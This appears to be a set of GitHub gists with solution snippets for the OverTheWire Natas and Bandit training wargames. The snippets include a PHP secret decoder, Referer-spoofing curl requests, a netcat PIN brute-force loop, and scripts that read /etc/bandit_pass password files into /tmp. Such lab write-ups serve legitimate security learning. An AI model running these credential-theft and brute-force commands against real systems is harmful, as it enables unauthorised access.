This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<? | |
print base64_decode(strrev(hex2bin("3d3d516343746d4d6d6c315669563362"))); | |
?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<? | |
$encodedSecret = "3d3d516343746d4d6d6c315669563362"; | |
function encodeSecret($secret) { | |
return bin2hex(strrev(base64_encode($secret))); | |
} | |
if(array_key_exists("submit", $_POST)) { | |
if(encodeSecret($_POST['secret']) == $encodedSecret) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<? | |
include "includes/secret.inc"; | |
if(array_key_exists("submit", $_POST)) { | |
if($secret == $_POST['secret']) { | |
print "Access granted. The password for natas7 is <censored>"; | |
} else { | |
print "Wrong secret"; | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl -u natas4:<password for natas4> -H "Referer: http://natas5.natas.labs.overthewire.org/" natas4.natas.labs.overthewire.org |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl -u natas0:natas0 http://natas0.natas.labs.overthewire.org |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
seq -f "<password of bandit24> %04g" 9999 | nc localhost 30002 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
cat /etc/bandit_pass/bandit24 > /tmp/stolen_password_from_bandit24/password.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo <password for bandit20> | nc -l 12345 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
./bandit20-do cat /etc/bandit_pass/bandit20 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
./bandit20-do whoami |